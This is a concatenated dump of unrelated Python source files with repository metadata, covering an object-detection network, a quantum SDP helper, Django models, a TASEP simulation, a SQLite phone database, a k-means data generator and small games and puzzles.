.conv(1, 1, 256, 1, 1, biased=False, relu=False, name='res4b21_branch2a')
.batch_normalization(relu=True, name='bn4b21_branch2a',is_training=False)
.conv(3, 3, 256, 1, 1, biased=False, relu=False, name='res4b21_branch2b')
.batch_normalization(relu=True, name='bn4b21_branch2b',is_training=False)
.conv(1, 1, 1024, 1, 1, biased=False, relu=False, name='res4b21_branch2c')
.batch_normalization(name='bn4b21_branch2c',is_training=False,relu=False))
(self.feed('res4b20_relu',
'bn4b21_branch2c')
.add(name='res4b21')
.relu(name='res4b21_relu')
.conv(1, 1, 256, 1, 1, biased=False, relu=False, name='res4b22_branch2a')
.batch_normalization(relu=True, name='bn4b22_branch2a',is_training=False)
.conv(3, 3, 256, 1, 1, biased=False, relu=False, name='res4b22_branch2b')
.batch_normalization(relu=True, name='bn4b22_branch2b',is_training=False)
.conv(1, 1, 1024, 1, 1, biased=False, relu=False, name='res4b22_branch2c')
.batch_normalization(name='bn4b22_branch2c',is_training=False,relu=False))
(self.feed('res4b21_relu',
'bn4b22_branch2c')
.add(name='res4b22')
.relu(name='res4b22_relu'))
#========= RPN ============
(self.feed('res4b22_relu')
.conv(3,3,512,1,1,name='rpn_conv/3x3')
.conv(1,1,len(anchor_scales)*3*2 ,1 , 1, padding='VALID', relu = False, name='rpn_cls_score'))
(self.feed('rpn_cls_score', 'gt_boxes', 'im_info','data')
.anchor_target_layer(_feat_stride, anchor_scales, name = 'rpn-data' ))
# Loss of rpn_cls & rpn_boxes
(self.feed('rpn_conv/3x3')
.conv(1,1,len(anchor_scales)*3*4, 1, 1, padding='VALID', relu = False, name='rpn_bbox_pred'))
#========= RoI Proposal ============
(self.feed('rpn_cls_score')
.spatial_reshape_layer(2, name = 'rpn_cls_score_reshape')
.spatial_softmax(name='rpn_cls_prob'))
(self.feed('rpn_cls_prob')
.spatial_reshape_layer(len(anchor_scales)*3*2, name = 'rpn_cls_prob_reshape'))
(self.feed('rpn_cls_prob_reshape','rpn_bbox_pred','im_info')
.proposal_layer(_feat_stride, anchor_scales, 'TRAIN',name = 'rpn_rois'))
(self.feed('rpn_rois','gt_boxes')
.proposal_target_layer(n_classes,name = 'roi-data'))
#========= Union Box ==========
(self.feed('roi-data', 'im_info')
.union_box_layer(name='whole_box'))
(self.feed('res4b22_relu', 'whole_box')
.roi_pool(7, 7, 1.0/16, name='whole_pool'))
#========= RCNN ============
(self.feed('res4b22_relu', 'roi-data')
.roi_pool(7, 7, 1.0/16, name='pool_5'))
#(self.feed('pool_5')
# .fc(1024, name='fc_add'))
(self.feed('pool_5','whole_pool')
.concat(axis=0, name='concat')
.fc(4096, name='fc6'))
(self.feed('roi-data','fc6')
.edge_box_layer(n_boxes=200,fc_dim=64,feat_dim=4096,dim=(4096, 4096, 4096),group=64, index=1,name='edges'))
(self.feed('fc6', 'edges')
.structure_inference_spmm(boxes=200, name='inference')
.fc(n_classes, relu=False, name='cls_score')
.softmax(name='cls_prob'))
(self.feed('inference')
.fc(n_classes*4, relu=False, name='bbox_pred'))
|
[
"603207232@qq.com"
] |
603207232@qq.com
|
363ceba786438dee7410cbcfa90f485b4dba6b31
|
0385ab743407cbc7276ec80c6307310690e9a6ec
|
/bilinear opt/src/semidefinite.py
|
741b46196b604c46b393a6bb80672f3359f55ef6
|
[] |
no_license
|
gsenno/bilinear-opt
|
f57449821ae5fe84f828c6354d39508be7088e77
|
0d7743bca803cbd090d6b7de488a06d08dd88811
|
refs/heads/master
| 2020-04-14T16:14:45.866287
| 2019-08-19T22:40:34
| 2019-08-19T22:40:34
| 163,946,486
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 5,845
|
py
|
from tree import *
from problem import *
import numpy as np
import picos as sdp
import cvxopt as cvx
# Pauli sigmas
sigmas = [[[1.,0.],[0.,1.]], [[0.,1.],[1.,0.]], [[0.,1.j],[-1.j,0.]], [[1.,0.],[0.,-1.]]]
# their transpose
sigmast = [[[1.,0.],[0.,1.]], [[0.,1.],[1.,0.]], [[0.,-1.j],[1.j,0.]], [[1.,0.],[0.,-1.]]]
# their trace
tracesigma = [2.0, 0.0, 0.0, 0.0]
def Pauli(j, nqubits, skip={}, transp={}):
# returns element of Pauli basis for Hermitians acting on Hilbert space
# of dimension 2^n normalized with respect to trace
# j: index in [0, 4^n-1]
# n: number of qubits
assert(isinstance(j, int) and isinstance(nqubits, int))
assert(j >= 0 and j < 4**nqubits)
val = np.matrix([[1]])
for idx in range(nqubits):
if idx not in skip:
# tensor corresponding sigmas[j % 4]
if idx in transp:
val = np.kron(val, sigmast[j % 4])
else:
val = np.kron(val, sigmas[j % 4])
else:
# instead just take the trace of sigmas[j % 4]
val = val * tracesigma[j % 4]
j = int(np.floor(j / 4))
return val/sqrt(2**nqubits)
class QuantumBilinearProblem(BilinearProblem):
def __init__(self):
BilinearProblem.__init__(self)
self.dims = [[]]
def init_matrix_form(self, dims, J, A = [], B = [], maximize = False, verb = 1):
# syntax for dims - [[a_1, a_2, a_3, ...], [b_1, b_2, b_3, ...]]
# all these values currently have to be powers of 2
# interprets first variable as a direct sum of a_i-dimensional subsystems,
# and the second variable as a direct sum of b_i-dimensional subsystems
# J is a array of the form of dims where every entry is a a_i*b_j matrix
# defining the correlations between the i-th X-variable and the j-th Y-variable
self.dims = dims
# total dimension of the vector problem
dimX = np.sum(np.array(dims[0])**2)
dimY = np.sum(np.array(dims[1])**2)
numX = len(dims[0])
numY = len(dims[1])
if verb >= 1:
print('problem shape:', numX, 'x', numY)
assert(len(J) == numX and len(J[0]) == numY)
# expand default arguments
if A == []:
for j in range(numX):
A.append(np.zeros((dims[0][j], dims[0][j])))
if B == []:
for j in range(numY):
B.append(np.zeros((dims[1][j], dims[1][j])))
# initialize Q matrix and vectors a and b
Q = np.zeros((dimX, dimY))
a = np.zeros(dimX)
b = np.zeros(dimY)
basei = 0
for k in range(numX):
nqX = int(np.log2(dims[0][k])) # dimension of X variable (in qubits)
basej = 0
for l in range(numY):
nqY = int(np.log2(dims[1][l])) # dimension of Y variable (in qubits)
if verb >= 2:
print('correlations matrix: ', nqX, 'x', nqY, 'qbits.')
corr = np.matrix(J[k][l]) # correlation matrix
# create entries for Q matrix
for i in range(dims[0][k]**2):
for j in range(dims[1][l]**2):
Q[basei+i][basej+j] = \
np.real(np.trace( np.kron(Pauli(i, nqX), Pauli(j, nqY)) * corr ))
# create vector a
for i in range(dims[0][k]**2):
a[basei+i] = np.real(np.trace( Pauli(i, nqX) * np.matrix(A[k]) ))
# create vector b
for j in range(dims[1][l]**2):
b[basej+j] = np.real(np.trace( Pauli(j, nqY) * np.matrix(B[l]) ))
basej += dims[1][l]**2
basei += dims[0][k]**2
if verb >= 1:
print('convert to vector problem...')
print('** Q =', Q)
print('** a =', a)
print('** b =', b)
self.init_vector_form(Q=Q, a=a, b=b, maximize=maximize, verb=verb)
# helper functions that create matrix variable and matrix solutions
def __getvarparams(self, var, idx):
dim = self.dims[var][idx]
return (dim, int(np.log2(dim)), int(np.sum(np.array(self.dims[var][0:idx])**2)))
def matvarX(self, idx=0, qubits=None, transp={}):
(sqrtdim, nqubits, baseidx) = self.__getvarparams(0, idx)
if qubits == None:
skip = {}
else:
skip = set(range(nqubits)) - qubits
X = self.varX()[baseidx]*cvx.matrix(Pauli(0, nqubits, skip))
for i in range(1, sqrtdim**2):
X += self.varX()[baseidx+i]*cvx.matrix(Pauli(i, nqubits, skip, set(transp)))
return X
def matvarY(self, idx=0, qubits=None, transp={}):
(sqrtdim, nqubits, baseidx) = self.__getvarparams(1, idx)
if qubits == None:
skip = {}
else:
skip = set(range(nqubits)) - qubits
Y = self.varY()[baseidx]*cvx.matrix(Pauli(0, nqubits, skip))
for i in range(1, sqrtdim**2):
Y += self.varY()[baseidx+i]*cvx.matrix(Pauli(i, nqubits, skip, set(transp)))
return Y
def matsolX(self, idx = 0):
(sqrtdim, nqubits, baseidx) = self.__getvarparams(0, idx)
X = np.zeros((sqrtdim, sqrtdim), dtype=np.complex_)
for i in range(0, sqrtdim**2):
X += self.solX[baseidx+i]*Pauli(i,nqubits)
return np.array(X)
def matsolY(self, idx = 0):
(sqrtdim, nqubits, baseidx) = self.__getvarparams(1, idx)
Y = np.zeros((sqrtdim, sqrtdim), dtype=np.complex_)
for i in range(0, sqrtdim**2):
Y += self.solY[baseidx+i]*Pauli(i,nqubits)
return np.array(Y)
|
[
"Gabriel Senno"
] |
Gabriel Senno
|
392c79002f49e52b52d194c26804c7be38c97f67
|
d11c5d1a1869de18377b82ab961e6285bd26d92b
|
/models/BEAST/CPC18BEAST/get_pBetter.py
|
49780e49d5bfee20da95ee1e2dc8924fc5129e7d
|
[] |
no_license
|
ManuelGuth/Interdisciplinary_Project_Decision_Making
|
23f793eda7b50d056ebdf118e0fd3c8d66cce691
|
20085b77e29e8dbbfd1c89512beee71056e53411
|
refs/heads/master
| 2022-12-19T06:41:16.333751
| 2020-09-04T08:30:00
| 2020-09-04T08:30:00
| 263,285,406
| 0
| 0
| null | 2020-06-26T14:21:41
| 2020-05-12T09:00:04
|
HTML
|
UTF-8
|
Python
| false
| false
| 1,319
|
py
|
import numpy as np
from .distSample import distSample
def get_pBetter(DistX, DistY, corr, accuracy=10000):
# Return probability that a value drawn from DistX is strictly larger than one drawn from DistY
# Input: 2 discrete distributions which are set as matrices of 1st column
# as outcome and 2nd its probability. DistX and DistY are numpy matrices; correlation between the distributions;
# level of accuracy in terms of number of samples to take from distributions
# Output: a list with the estimated probability that X generates value strictly larger than Y, and
# the probability that Y generates value strictly larger than X
nXbetter = 0
nYbetter = 0
for j in range(1, accuracy+1):
rndNum = np.random.uniform(size=2)
sampleX = distSample(DistX[:, 0], DistX[:, 1], rndNum[0])
if corr == 1:
sampleY = distSample(DistY[:, 0], DistY[:, 1], rndNum[0])
elif corr == -1:
sampleY = distSample(DistY[:, 0], DistY[:, 1], 1-rndNum[0])
else:
sampleY = distSample(DistY[:, 0], DistY[:, 1], rndNum[1])
nXbetter = nXbetter + int(sampleX > sampleY)
nYbetter = nYbetter + int(sampleY > sampleX)
pXbetter = nXbetter / accuracy
pYbetter = nYbetter / accuracy
return [pXbetter, pYbetter]
|
[
"manuel.guth@gmx.net"
] |
manuel.guth@gmx.net
|
1507b7a88f9e1cb0e59499eaa00107a31deafb07
|
1fd7149ee0f7e945b178a42e3dcaee4eba0c60ee
|
/app/models.py
|
f72825e37db91a57dd111e97a492ed1ccc432677
|
[
"Apache-2.0"
] |
permissive
|
wenzizone/simpleCMDB
|
7e0d96d68a2daf61901571e7f52cd008730a2c6f
|
03e6c005e9e860531ffed72aacaf1ebf8c666035
|
refs/heads/master
| 2021-01-09T20:35:05.103711
| 2016-07-13T15:53:03
| 2016-07-13T15:53:03
| 60,067,263
| 0
| 1
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 1,660
|
py
|
# -*- coding:utf-8 -*-
from __future__ import unicode_literals
from django.db import models
# Create your models here.
# 服务器所在机房
class Cloud(models.Model):
name = models.CharField(max_length=50)
comments = models.CharField(max_length=255, null=True)
# def __unicode__(self):
# return u'%d %s %s' % (self.id, self.name, self.comments)
# 服务项目
class Product(models.Model):
name = models.CharField(max_length=50)
subproduct = models.CharField(max_length=100)
product_info = models.CharField(max_length=255, null=True)
# def __unicode__(self):
# return u'%d %s %s %s' % (self.id, self.name, self.subproduct,
# self.product_info)
# 服务器信息
# 在添加服务器的时候人工输入或选择
class Server(models.Model):
public_ip = models.GenericIPAddressField()
cloud = models.ForeignKey(Cloud)
in_china = models.CharField(max_length=8)
product = models.ForeignKey(Product)
create_time = models.DateField()
server_status = models.CharField(max_length=20)
update_time = models.DateField(null=True)
# def __unicode__(self):
# return u'%d %s %s %s %s %s %s' % (self.id,
# self.objects.filter(cloud=models.Cloud.id), self.in_china, self.product,
# self.server_status, self.create_time, self.update_time)
# 服务器详细信息
# 在ansible执行的时候,自动更新
class Detail(models.Model):
server = models.ForeignKey(Server, unique=True)
hostname = models.CharField(max_length=255)
internal_ip = models.GenericIPAddressField()
system = models.CharField(max_length=50)
update_time = models.DateField(null=True)
|
[
"wenzizone@126.com"
] |
wenzizone@126.com
|
423ba65aa9e0c52af1aed42ca9aadde25402c1e3
|
091233607bba00f1a4ada244231a1b4165881815
|
/blog/models.py
|
43c83e2f91d0192006e3196969342397acc820d5
|
[] |
no_license
|
dulcedu/Monitoring
|
74683202d5d917c52cef947616bc08c379e031c2
|
0e41a35c6db2496984de1ad8460e3289fbab85e6
|
refs/heads/master
| 2020-04-05T13:04:18.859902
| 2017-07-13T02:54:28
| 2017-07-13T02:54:28
| 95,055,228
| 2
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 531
|
py
|
from django.db import models
from django.utils import timezone
class Post(models.Model):
author = models.ForeignKey('auth.User')
title = models.CharField(max_length=200)
text = models.TextField()
created_date = models.DateTimeField(
default=timezone.now)
published_date = models.DateTimeField(
blank=True, null=True)
def publish(self):
self.published_date = timezone.now()
self.save()
def __str__(self):
return self.title
# Create your models here.
|
[
"dulcedu@gmail.com"
] |
dulcedu@gmail.com
|
1cb5153b97fd56483da49cff2155bef39089fef7
|
07f0e9c7d80292576e04e41bcc2e97a140a32006
|
/TASEP/open_bc_random_particles.py
|
3a492098ebabe4dad27f02a9efde3728d4942c8c
|
[] |
no_license
|
rahulmeena810/TASEP
|
422e38b02307a6e39ef0fd2c12f443e833a45760
|
970d852741d36e9426093ab9e0bd0c8838aebc13
|
refs/heads/master
| 2021-06-16T07:21:09.863221
| 2017-05-30T10:21:41
| 2017-05-30T10:21:41
| null | 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 1,911
|
py
|
import random
import math
import numpy as np
import matplotlib.pyplot as plt
#no. of sites
n = 1000
l=np.zeros(n,dtype=int)
for i in range(n):
l[i]=i+1
#density
p=np.zeros(n,dtype=float)
alpha = 1
beta = 0
q=1
for k in range(n):
site = np.zeros(l[k],dtype=int)
noOfParticles=0
sitesOccupied=[]
for r in range(100):
i = random.randint(0,l[k]-1)
# print(i," i")
if i==0 and site[0]==0 :
t=random.uniform(0,1)
# print(t,"t1")
if t<alpha :
site[0]=1
noOfParticles+=1
# print(site ,"1st if")
# print(noOfParticles, "no of 1")
sitesOccupied.append(0)
elif i==l[k]-1 and site[l[k]-1]==1 :
t= random.uniform(0,1)
# print(t,"t2")
if t<beta :
site[l[k]-1]=0
noOfParticles-=1
# print(site , "2nd if")
# print(noOfParticles,"no of 2")
sitesOccupied.remove(l[k]-1)
i=random.randint(0,len(sitesOccupied))
if sitesOccupied[i] != l[k]-1 and site[sitesOccupied[i]+1]==0 :#elif i<l[k]-1 and i in sitesOccupied==True and (i+1) in sitesOccupied==False: #-1<i<(l[k]-1) and site[i]==1 and site[i+1]==0:
t=random.uniform(0,1)
# print(t, "t3")
if t<q :
site[i]=0
site[i+1]=1
# print(site , "3rd if")
# print(noOfParticles,"no of 3")
# print(r, " r")
sitesOccupied.remove(i)
sitesOccupied.append(i+1)
p[k]=noOfParticles/l[k]
print(k)
print(p)
plt.scatter(l,p,marker='o')
plt.xlabel("L(no. of sites)")
plt.ylabel("Density")
plt.show()
# if i have to move particles randomly then how will i fill the first site.
|
[
"noreply@github.com"
] |
rahulmeena810.noreply@github.com
|
553c6f2c743e4c35f72f296a10c63119d43226c0
|
c5cb31e88abdd44b6a7b568e8bc1a884ecfaa0b1
|
/app/db.py
|
88d0e50716465d80decc229eab1c01689edb6c29
|
[
"MIT"
] |
permissive
|
nitrocode/phone-code-names
|
7c7d9675ef41601d7f7ccd3ad30ad1d48e80ab1a
|
172050f8683616d3bb052ea21406545f31dc2c09
|
refs/heads/main
| 2021-06-21T18:44:19.063996
| 2021-04-21T15:13:39
| 2021-04-21T15:13:39
| 215,901,319
| 8
| 0
|
NOASSERTION
| 2021-04-21T15:13:39
| 2019-10-17T23:13:12
|
HTML
|
UTF-8
|
Python
| false
| false
| 4,395
|
py
|
import sqlite3
from sqlite3 import Error
DEVICE_TABLE = 'devices'
DEVICE_FIELDS = ['brand', 'name', 'device', 'model', 'source']
STAT_TABLE = 'stats'
STAT_FIELDS = ['rank', 'code', 'code_orig', 'count', 'source']
FONO_TABLE = 'fono'
FONO_FIELDS = [
'rank', 'count', 'code',
'Brand', 'DeviceName', '_2g_bands', '_3_5mm_jack_', '_3g_bands',
'_4g_bands', 'alert_types', 'announced', 'audio_quality', 'battery_c',
'bluetooth', 'body_c', 'browser', 'build', 'camera', 'card_slot',
'chipset', 'colors', 'cpu', 'dimensions', 'display', 'display_c', 'edge',
'features', 'features_c', 'gprs', 'gps', 'gpu', 'infrared_port',
'internal', 'java', 'loudspeaker', 'loudspeaker_', 'messaging',
'multitouch', 'music_play', 'network_c', 'nfc', 'os', 'performance',
'price', 'primary_', 'protection', 'radio', 'resolution', 'sar', 'sar_eu',
'sar_us', 'secondary', 'sensors', 'sim', 'single', 'size', 'sound_c',
'speed', 'stand_by', 'status', 'talk_time', 'technology', 'type', 'usb',
'video', 'weight', 'wlan'
]
def create_connection(db_file):
"""Create a database connection to the SQLite database
specified by the db_file
:param db_file: database file
:return: Connection object or None
"""
conn = None
try:
conn = sqlite3.connect(db_file)
except Error as e:
print(e)
return conn
def create_table(conn, table, fields):
"""Create table for csv"""
cur = conn.cursor()
cur.execute(f"CREATE TABLE {table} ({','.join(fields)});")
cur.close()
def create_devices_table(conn):
"""Create table for csv"""
return create_table(conn, DEVICE_TABLE, DEVICE_FIELDS)
def create_stats_table(conn):
"""Create table for csv"""
return create_table(conn, STAT_TABLE, STAT_FIELDS)
def create_fono_table(conn):
"""Create table for csv"""
return create_table(conn, FONO_TABLE, FONO_FIELDS)
def insert_row(conn, table, fields, to_db):
"""Insert data to db for csv"""
cur = conn.cursor()
values = ', '.join(["?"]*len(to_db[0]))
cur.executemany(
f"INSERT INTO {table} ({','.join(fields)}) VALUES ({values});",
to_db
)
conn.commit()
cur.close()
def insert_row_dict(conn, table, fields, to_db):
"""Insert data to db for csv"""
cur = conn.cursor()
values = ', '.join(["?"]*len(to_db[0]))
cur.executemany(
f"INSERT INTO {table} ({','.join(fields)}) VALUES ({values});",
to_db
)
conn.commit()
cur.close()
def insert_device_row(conn, to_db):
"""Insert data to db for csv"""
return insert_row(conn, DEVICE_TABLE, DEVICE_FIELDS, to_db)
def insert_stat_row(conn, to_db):
"""Insert data to db for csv"""
return insert_row(conn, STAT_TABLE, STAT_FIELDS, to_db)
def insert_fono_row(conn, to_db):
"""Insert data to db for csv"""
return insert_row(conn, FONO_TABLE, FONO_FIELDS, to_db)
def get_device(conn, search):
"""Query all rows in the tasks table
:param conn: the Connection object
:return:
"""
cur = conn.cursor()
# selects all fields from table where the device / model contains - exact
fields = ','.join(DEVICE_FIELDS)
cur.execute(f"select {fields} from {DEVICE_TABLE} where device = ? or model = ?",
(search, search))
# to keep it simple, just get the first record found
data = cur.fetchone()
if not data:
# selects all fields from table where the device / model contains
# the search
# the COLLATE NOCASE makes the search case insensitive
cur.execute(f"select {fields} from {DEVICE_TABLE} where device like ? or model like ? "
'COLLATE NOCASE;',
('%' + search + '%', '%' + search + '%'))
# to keep it simple, just get the first record found
data = cur.fetchone()
cur.close()
if data:
return {f:data[i] for i, f in enumerate(DEVICE_FIELDS)}
def get_lineageos_stats(conn, limit):
"""Retrieves lineageos stats with a specified limit"""
conn.row_factory = sqlite3.Row
cur = conn.cursor()
# selects all fields from table where the device / model contains - exact
cur.execute(f'select rank, code, count from stats limit {limit};')
# to keep it simple, just get the first record found
data = cur.fetchall()
cur.close()
conn.row_factory = None
return data
|
[
"nitrocode@users.noreply.github.com"
] |
nitrocode@users.noreply.github.com
|
106c8194d133957671c982f1d2867ec94373e485
|
a37105fb7af3d6e29c407702db2b43066c0abd1a
|
/icc_pt2/week1/ExeProg_02/TESTES_tarefa_praticar_ex02.py
|
6c6e90492c920b7db027d10f236196da3bffcc31
|
[] |
no_license
|
roque-brito/ICC-USP-Coursera
|
19bc0c6eb03ee6a1671eb9ceb104453bb8554cfc
|
628383080fd44606c7ab1927b3dc3062b47c0c88
|
refs/heads/master
| 2023-05-09T21:42:35.786829
| 2021-06-11T00:37:14
| 2021-06-11T00:37:14
| 363,147,051
| 1
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 377
|
py
|
def sao_multiplicaveis(m1, m2):
n_colunas = len(m1[0])
n_linhas = len(m2)
if n_colunas == n_linhas:
return True
else:
return False
def teste():
m1 = [[1, 2, 3], [4, 5, 6]]
m2 = [[2, 3, 4], [5, 6, 7]]
m3 = [[1], [2], [3]]
m4 = [[1, 2, 3]]
y = sao_multiplicaveis(m3, m4)
return y
x = teste()
print(x)
|
[
"roque.brito@outlook.com"
] |
roque.brito@outlook.com
|
dbd0c8435ceecd1429f22d8e256b5e74133012b1
|
786a89a4bd31e0a5953094c7880021cc98f78f98
|
/train/TR/ABC058c.py
|
90266401f080df01ed4d6a2c887c5c71ee375ba7
|
[] |
no_license
|
enjoy82/atcodersyozin
|
c12eb9cc04e61cedcdc13643b84e8c87c13ff4b1
|
c8a73577d1d75db2d5c22eab028f942f75f2fba7
|
refs/heads/master
| 2022-10-04T04:47:16.835712
| 2022-09-30T07:15:47
| 2022-09-30T07:15:47
| 243,669,940
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 431
|
py
|
n = int(input())
alpha = ("abcdefghijklmnopqrstuvwxyz")
ans = [100] * 26
for i in range(n):
S = list(input())
tmp = [0]*26
for j in range(len(S)):
for k in range(26):
if S[j] == alpha[k]:
tmp[k] += 1
for j in range(26):
if ans[j] > tmp[j]:
ans[j] = tmp[j]
ansa = ""
for i in range(26):
for j in range(ans[i]):
ansa = ansa + alpha[i]
print(ansa)
|
[
"naoya990506@gmail.com"
] |
naoya990506@gmail.com
|
33f2b3e6e555b098045a42fd33677e80c2dca3ad
|
94528515b0544aba0258601d53b28fd337a8b204
|
/data-generator/kmeans_gen.py
|
509f187efe33ebb0b41bf5f511dc87a50fa860e1
|
[] |
no_license
|
harshavardhana/KVCBench
|
6f801c0830c1d48ee40e3ba460ef6bdd12597324
|
b7c0a91e0a74ca22d2f5b6279b36cb96079b8d16
|
refs/heads/master
| 2020-06-23T22:52:34.170277
| 2017-03-09T10:41:30
| 2017-03-09T10:41:30
| null | 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 4,203
|
py
|
#!/usr/bin/env python
# Kmeans data generator
# Each record is a point which has D dimensions, each dimension has a float value range from [vmin, vmax]
# The data is formated as:
#
# d11, d12, d13, ...
# d21, d22, d23, ...
# ...
import optparse
import os
import math
import random
import multiprocessing
# fileSize = 234 * 1024 * 1024
# fileNum = 40
#
# dimension = 100
# max_value = 80
# min_value = -40
output_file_prefix = "kmeans.data"
def gen_worker(p_id, file_number, file_size, store_path, dim, vmax, vmin):
print "Work-%d, process %d" % (p_id, file_number)
if file_number <= 0:
return
for k in range(file_number):
output_file_name = "%s-%d-%d.out" % (output_file_prefix, p_id, k)
output_file_path = os.path.join(store_path, output_file_name)
out = open(output_file_path, "w")
while os.stat(output_file_path).st_size < file_size:
lineStr = ""
for j in xrange(dim):
lineStr = lineStr + " %.4f" % (random.random() * vmin + vmax)
lineStr = lineStr[1:] + "\n"
out.write(lineStr)
print out.name + " complete."
if __name__ == '__main__':
parser = optparse.OptionParser()
parser.add_option('-w', '--worker',
action="store", dest="worker_size", help="number of worker process (default: 1)",
type='int', default=1)
parser.add_option('-s', '--filesize',
action="store", dest="file_size", help="each slice file size in mega-bytes (default: 234 [MB])",
type='int', default=234)
parser.add_option('-n', '--filenum',
action='store', dest="file_number", help="number of slice files (default: 40)",
type='float', default=40.0)
parser.add_option('-d', '--dimension',
action='store', dest='dim', help="dimension for each record (default: 100)",
type='int', default=100)
parser.add_option('-p', '--path',
action='store', dest='dest_path', help='destination path (default: .)',
type='string', default='.')
parser.add_option('--min',
action='store', dest='min_value', help="maximum for each dimension (default -80.0)",
type='float', default=-80.0)
parser.add_option('--max',
action='store', dest='max_value', help="minimum for each dimension (default 40.0)",
type='float', default=40)
options, args = parser.parse_args()
worker_size = options.worker_size
file_size = options.file_size * 1024 * 1024
total_file_number = options.file_number
dim = options.dim
min_value = options.min_value
max_value = options.max_value
dest_path = options.dest_path
if not os.path.exists(dest_path):
os.makedirs(dest_path)
def formatSize(fsize):
ONE_KB_MAX = 1024.0
ONE_MB_MAX = 1024.0 * 1024
ONE_GB_MAX = 1024.0 * 1024 * 1024
if fsize < ONE_KB_MAX:
return "%d B" % fsize
elif fsize < ONE_MB_MAX:
return "%.2f KB" % (fsize / ONE_KB_MAX)
elif fsize < ONE_GB_MAX:
return "%.2f MB" % (fsize / ONE_MB_MAX)
else:
return "%.2f GB" % (fsize / ONE_GB_MAX)
print """
Generator Worker Number: %d
Total data size: %s, total file number: %d, each file size: %s
Destination path: %s
Dimension: %d, min value: %.2f, max value: %.2f
""" % (worker_size,
formatSize(file_size * total_file_number), total_file_number, formatSize(file_size),
dest_path,
dim, min_value, max_value)
jobs = []
file_number_per_worker = math.ceil(1.0 * total_file_number / worker_size)
for pid in xrange(worker_size):
if total_file_number >= file_number_per_worker:
fnum = file_number_per_worker
else:
fnum = total_file_number
p = multiprocessing.Process(target=gen_worker, args=(
pid, int(fnum), file_size, dest_path, dim, max_value, min_value))
jobs.append(p)
p.start()
total_file_number -= file_number_per_worker
|
[
"chcdlf@gmail.com"
] |
chcdlf@gmail.com
|
665ada025e0455410a209ed57869aa0dd912a015
|
27618b96c66aa397f15afb1463f36b0ee3c1bf67
|
/tictactoe.py
|
c0b5325ecdc236600e2a0d15d9cb980223fe15cc
|
[] |
no_license
|
connorbarkr/tictactoe
|
10fd5b47248de9036c14df7d9318c50f1302752e
|
a907bb1f9f2998caab2cd0cd2e87c680db0d1dfc
|
refs/heads/master
| 2021-07-04T10:54:11.538834
| 2017-09-24T20:55:16
| 2017-09-24T20:55:16
| 104,675,512
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 3,884
|
py
|
import random
exampleBoard = ['1', '2', '3',
'4', '5', '6',
'7', '8', '9']
board = [' ', ' ', ' ',
' ', ' ', ' ',
' ', ' ', ' ']
def intro():
first = fiftyFifty()
print("Here's what the board will look like:")
drawBoard(exampleBoard)
print("To select a tile to place your marker on, type the corresponding number when it's your turn!")
if first == 0:
print("You go first!")
else:
print("The computer goes first!")
return first;
def fiftyFifty():
return random.randint(0, 1)
def oneToNine():
return random.randint(1, 9)
def teamChoice():
while True:
choice = input("Would you like to be x's or o's? (Type 'x' or 'o')").upper()
if (choice != 'X' and choice != 'O'):
print("I'm sorry, you'll have to input a valid choice")
continue
else:
print("Great! You're team " + choice + "s.")
return choice
break
def playerMoveChoice(selection):
while True:
choice = input("Enter the number of the square you'd like to select: ")
if choice.isalpha() or int(choice) < 1 or int(choice) > 9:
print("Please enter a valid number between 1 and 9.")
continue
elif board[int(choice) - 1] != " ":
print("That space is already taken! Pick a valid one.")
continue
else:
board[(int(choice) - 1)] = selection
drawBoard(board)
break
def computerMoveChoice(computerSelection):
print("It's the computer's turn!")
while True:
choice = oneToNine()
if board[choice - 1] != ' ':
continue
board[choice - 1] = computerSelection;
drawBoard(board)
break
def winnerCheck(board, symbol):
if (board[0] == symbol and board[4] == symbol and board[8] == symbol):
return 1
elif (board[2] == symbol and board[4] == symbol and board[6] == symbol):
return 1
elif (board[0] == symbol and board[3] == symbol and board[6] == symbol):
return 1
elif (board[1] == symbol and board[4] == symbol and board[7] == symbol):
return 1
elif (board[2] == symbol and board[5] == symbol and board[8] == symbol):
return 1
elif (board[0] == symbol and board[1] == symbol and board[2] == symbol):
return 1
elif (board[3] == symbol and board[4] == symbol and board[5] == symbol):
return 1
elif (board[6] == symbol and board[7] == symbol and board[8] == symbol):
return 1
else:
return 0
def drawBoard(boardVals):
print("\t" + boardVals[0] + "\t|\t" + boardVals[1] + "\t|\t" + boardVals[2] + "\t")
print("------------------------------------------------")
print("\t" + boardVals[3] + "\t|\t" + boardVals[4] + "\t|\t" + boardVals[5] + "\t")
print("------------------------------------------------")
print("\t" + boardVals[6] + "\t|\t" + boardVals[7] + "\t|\t" + boardVals[8] + "\t")
def main():
selection = teamChoice()
if selection == "X":
computerSelection = "O"
else:
computerSelection = "X"
first = intro()
if first == 0:
while True:
playerMoveChoice(selection)
if winnerCheck(board, selection) == 1:
print("You win!")
break
computerMoveChoice(computerSelection)
if winnerCheck(board, computerSelection) == 1:
print("You lose!")
break
else:
while True:
computerMoveChoice(computerSelection)
if winnerCheck(board, computerSelection) == 1:
print("You lose!")
break
playerMoveChoice(selection)
if winnerCheck(board, selection) == 1:
print("You win!")
break
main()
|
[
"eskimopies1999@gmail.com"
] |
eskimopies1999@gmail.com
|
1016f6d79377f343fe8649f1097cb080aff6962d
|
e77b92df446f0afed18a923846944b5fd3596bf9
|
/Programers_algo/Study_1/pro1_pocketmon.py
|
c8c7710f15b1a4c88eb15ba5146900693aa6b42c
|
[] |
no_license
|
sds1vrk/Algo_Study
|
e40ca8eb348d1fc6f88d883b26195b9ee6f35b2e
|
fbbc21bb06bb5dc08927b899ddc20e6cde9f0319
|
refs/heads/main
| 2023-06-27T05:49:15.351644
| 2021-08-01T12:43:06
| 2021-08-01T12:43:06
| 356,512,348
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 340
|
py
|
# 포켓몬 문제
def solution(nums):
target=len(nums)/2
set_numbers=set(nums)
answer = 0
for _ in range(len(set_numbers)):
if answer<target:
answer+=1
elif answer==target:
break
return answer
# print(solution([3,1,2,3]))
# solution([3,3,3,2,2,4])
solution([3,3,3,2,2,2])
|
[
"51287886+sds1vrk@users.noreply.github.com"
] |
51287886+sds1vrk@users.noreply.github.com
